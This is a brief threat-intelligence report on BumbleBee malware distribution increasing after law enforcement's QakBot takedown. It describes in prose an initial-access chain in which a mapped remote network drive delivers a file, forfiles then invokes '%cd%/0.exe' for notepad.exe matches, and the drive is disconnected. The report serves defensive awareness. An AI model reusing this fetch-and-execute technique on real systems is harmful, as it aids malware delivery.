BumbleBee Swarms with QakBot's Takedown

Category: Malware Campaign | Industry: Global | Source: @Kostastsale - X

With the abrupt Qakbot hiatus, thanks to the FBI and international law enforcement, security researchers have noticed an uptick in BumbleBee malware distribution. A notable BumbleBee TTP was reported by security researcher and DFIR Report member, Kostas (@Kostastsale on X/Twitter). The command issued for the malware's initial entry utilized a command line (cmd) to map a network drive to a remote website, passing user credentials to download a file before disconnecting the network share. Subsequently, a 'forfiles' command was executed to search for files named 'notepad.exe' within a specific directory. For each discovered instance of 'notepad.exe,' the command '%cd%/0.exe' was invoked, implying some form of file manipulation or execution. The command concludes with the network drive being forcefully disconnected.